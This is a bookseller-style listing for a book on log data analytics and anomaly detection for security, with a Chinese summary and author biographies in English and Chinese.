Smart Log Data Analytics: Techniques for Advanced Security Analysis
暫譯: 智慧日誌數據分析：進階安全分析技術

本書提供了有關計算機日誌數據分析的智能方法的見解，目標是識別對抗行為。全書分為三個主要部分，共八章，詳細介紹了現有解決方案以及超越當前技術的創新技術。本書的第一部分激發了整個主題，突出了日誌數據分析方法的主要挑戰、趨勢和設計標準，並進一步調查和比較了當前的技術水平。第二部分介紹了基於字符而非基於標記的方法，因此在更細緻的層面上運作。此外，這些解決方案是為“在線使用”而設計的，不僅用於取證分析，還能有效地處理新日誌行，隨著其到達而進行單次通過處理。一種先進的時間序列分析方法旨在檢測觀察系統整體行為特徵的變化，並通過日誌分析識別趨勢和周期性。第三部分介紹了AMiner的設計，這是一個先進的開源組件，用於日誌數據異常挖掘。AMiner配備了多個檢測器，以識別新事件、新參數、新關聯、新值和未知值組合，並可以作為獨立解決方案或作為連接到SIEM解決方案的傳感器運行。更先進的檢測器有助於確定日誌行可變部分的特徵，特別是數值和類別字段的屬性。

全書中的詳細示例使讀者能夠更好地理解和應用所介紹的技術，並使用開源軟件。逐步指導幫助讀者熟悉這些概念，並更好地理解其內部機制。一個日誌測試數據集可作為免費下載，讓讀者能夠迅速啟動系統。

本書旨在為從事網絡安全領域的研究人員，特別是系統監控、異常檢測和入侵檢測的研究人員提供幫助。本書的內容對於學習計算機科學、計算機技術和信息系統的高級學生特別有用。前瞻性的實踐者，若希望熟悉先進的異常檢測方法，也會對本書感興趣。

Florian Skopik is Head of the Cyber Security Research Program at the Austrian Institute of Technology (AIT) with a team comprising around 30 people. He spent 10+ years in cyber security research, before, and partly in parallel, another 15 years in software development. Nowadays, he coordinates national and large-scale international research projects, as well as the overall research direction of the team. His main interests are centered on critical infrastructure protection, smart grid security and national cyber security and defense. Since 2018, Florian further works as ISO 27001 Lead Auditor. Before joining AIT in 2011, Florian was with the Distributed Systems Group at the Vienna University of Technology as a research assistant and post-doctoral research scientist from 2007 to 2011, where he was involved in a number of international research projects dealing with cross-organizational collaboration over the Web. In context of these projects, he also finished his PhD studies. Florian further spent a sabbatical at IBM Research India in Bangalore for several months. He published more than 125 scientific conference papers and journal articles and holds more than 50 industry recognized security certifications, including CISSP, CISM, CISA, CRISC, and CCNP Security. In 2017 he finished a professional degree in Advanced Computer Security at the Stanford University, USA. Florian is member of various conference program committees and editorial boards and standardization groups, such as ETSI TC Cyber and OASIS CTI. He frequently serves as reviewer for numerous high-profile journals, including Elsevier's Computers & Security. He is registered subject matter expert of ENISA in the areas of new ICTs and emerging application areas as well as Critical Information Infrastructure Protection (CIIP) and CSIRTs cooperation. In his career, he gave several keynote speeches, organized scientific panel discussions at flagship conferences, such as a smart grid security panel at the IEEE Innovative Smart Grid Technologies (ISGT) conference in Washington D.C., and acted as co-moderator of the National Austrian Cyber Security Challenge 2017, and as jury member of the United Nations Cyber Security Challenge 2019. Florian is IEEE Senior Member, Senior Member of the Association for Computing Machinery (ACM), Member of (ISC)2, Member of ISACA and Member of the International Society of Automation (ISA).
Markus Wurzenberger is a scientist and project manager at the Austrian Institute of Technology (AIT), located in Vienna, Austria. His main research interests are log data analysis with focus on anomaly detection and cyber threat intelligence (CTI). This includes the development of (i) novel machine learning that allow online processing of large amounts of log data to enable attack detection in real time, and (ii) artificial intelligence (AI) methods and concepts for extracting threat information from anomalies to automatically generate actionable and shareable CTI. Besides the involvement in several national and international research projects, Markus is one of the key researchers working on AIT's anomaly detection project AECID (Automatic Event Correlation for Incident Detection). Among the most prominent solutions developed within this project, Markus and his team created AMiner, a software component for log analysis, which implements several anomaly detection algorithms and is included as package in the official Debian distribution. In 2016, Markus enrolled for his PhD studies in computer science at the Vienna University of Technology, with focus on anomaly detection in computer log data. The subject of his PhD aligns with several national and international research projects AIT is involved in. In 2015 Markus obtained his Master's Degree in Technical Mathematics at the Vienna University of Technology. Since 2014 he is a full-time researcher at AIT in the area of cyber security.

Max Landauer finished his Bachelor's Degree in Business Informatics at the Vienna University of Technology in 2016. In 2017, he joined the Austrian Institute of Technology (AIT), where he carried out his Master's Thesis on clustering and time-series analysis of system log data. He started his PhD studies as a cooperative project between the Vienna University of Technology and the Austrian Institute of Technology in 2018. For his dissertation, Max is working on an automatic threat intelligence mining approach that extracts actionable CTI from raw log data. The goal of this research is to transform threat information shared by different organizations into abstract alert patterns that allow detection and classification of similar attacks. Moreover, Max is a maintainer of the logdata-anomaly-miner (AMiner), an Open-Source agent for parsing and analyzing all kinds of system logs, that is developed at AIT and available in the Debian distribution. He is also contributing to multiple other tools that are part of AECID (Automatic Event Correlation for Incident Detection), a framework for all kinds of efficient and scalable log data analysis techniques such as parser generation and log clustering. Max has multiple years of experience with nationally and internationally funded projects in numerous areas, including machine learning, artificial intelligence, cyber-physical systems, and digital service chains. He is currently employed as a Junior Scientist in the center for Digital Safety and Security at the Austrian Institute of Technology. His main research interests are log data analysis, anomaly detection, and cyber threat intelligence.

Florian Skopik 是奧地利科技研究院 (AIT) 網路安全研究計畫的負責人，帶領約 30 人的團隊。他在網路安全研究領域擁有超過 10 年的經驗，並且在此之前及部分重疊的時間內，從事了 15 年的軟體開發工作。如今，他負責協調國內及大型國際研究專案，以及團隊的整體研究方向。他的主要興趣集中在關鍵基礎設施保護、智慧電網安全以及國家網路安全與防禦。自 2018 年以來，Florian 也擔任 ISO 27001 首席審核員。在 2011 年加入 AIT 之前，Florian 曾在維也納科技大學的分散式系統組擔任研究助理及博士後研究科學家，從 2007 年到 2011 年參與多個國際研究專案，專注於跨組織的網路協作。在這些專案的背景下，他也完成了博士學位的研究。Florian 還曾在印度班加羅爾的 IBM 研究所度過幾個月的休假。他發表了超過 125 篇科學會議論文和期刊文章，並持有超過 50 種業界認可的安全認證，包括 CISSP、CISM、CISA、CRISC 和 CCNP Security。2017 年，他在美國史丹佛大學完成了進階電腦安全的專業學位。Florian 是多個會議程序委員會、編輯委員會和標準化小組的成員，例如 ETSI TC Cyber 和 OASIS CTI。他經常擔任多個高知名度期刊的審稿人，包括 Elsevier 的 Computers & Security。他是 ENISA 在新資訊通信技術 (ICT) 和新興應用領域以及關鍵資訊基礎設施保護 (CIIP) 和 CSIRTs 合作方面的註冊主題專家。在他的職業生涯中，他曾多次發表主題演講，並在一些旗艦會議上組織科學小組討論，例如在華盛頓特區的 IEEE 創新智慧電網技術 (ISGT) 會議上舉辦的智慧電網安全小組，並擔任 2017 年國家奧地利網路安全挑戰賽的共同主持人，以及 2019 年聯合國網路安全挑戰賽的評審委員。Florian 是 IEEE 高級會員、計算機協會 (ACM) 高級會員、(ISC)2 會員、ISACA 會員和國際自動化學會 (ISA) 會員。

Markus Wurzenberger 是奧地利科技研究院 (AIT) 的科學家和專案經理，位於奧地利維也納。他的主要研究興趣是日誌數據分析，專注於異常檢測和網路威脅情報 (CTI)。這包括開發 (i) 新穎的機器學習方法，允許對大量日誌數據進行在線處理，以實現實時攻擊檢測，以及 (ii) 用於從異常中提取威脅信息的人工智慧 (AI) 方法和概念，以自動生成可行且可共享的 CTI。除了參與多個國內和國際研究專案外，Markus 還是 AIT 異常檢測專案 AECID (自動事件關聯以進行事件檢測) 的主要研究人員之一。在這個專案中，Markus 和他的團隊開發了 AMiner，一個用於日誌分析的軟體組件，實現了多種異常檢測算法，並作為套件包含在官方 Debian 發行版中。2016 年，Markus 在維也納科技大學報考計算機科學的博士學位，專注於計算機日誌數據中的異常檢測。他的博士研究主題與 AIT 參與的多個國內和國際研究專案相符。2015 年，Markus 在維也納科技大學獲得技術數學碩士學位。自 2014 年以來，他一直是 AIT 網路安全領域的全職研究員。

Max Landauer 於 2016 年在維也納科技大學完成商業資訊學學士學位。2017 年，他加入奧地利科技研究院 (AIT)，並在那裡進行了有關系統日誌數據的聚類和時間序列分析的碩士論文。他於 2018 年開始了維也納科技大學與奧地利科技研究院之間的合作專案博士研究。Max 的論文研究主題是自動威脅情報挖掘方法，從原始日誌數據中提取可行的 CTI。這項研究的目標是將不同組織共享的威脅信息轉化為抽象的警報模式，以便檢測和分類類似的攻擊。此外，Max 是 logdata-anomaly-miner (AMiner) 的維護者，這是一個用於解析和分析各種系統日誌的開源代理，該代理在 AIT 開發並可在 Debian 發行版中獲得。他還參與了多個其他工具的開發，這些工具是 AECID (自動事件關聯以進行事件檢測) 的一部分，該框架用於各種高效且可擴展的日誌數據分析技術，如解析器生成和日誌聚類。Max 在多個領域擁有數年的國內和國際資助專案經驗，包括機器學習、人工智慧、網路物理系統和數位服務鏈。他目前在奧地利科技研究院的數位安全與安全中心擔任初級科學家。他的主要研究興趣是日誌數據分析、異常檢測和網路威脅情報。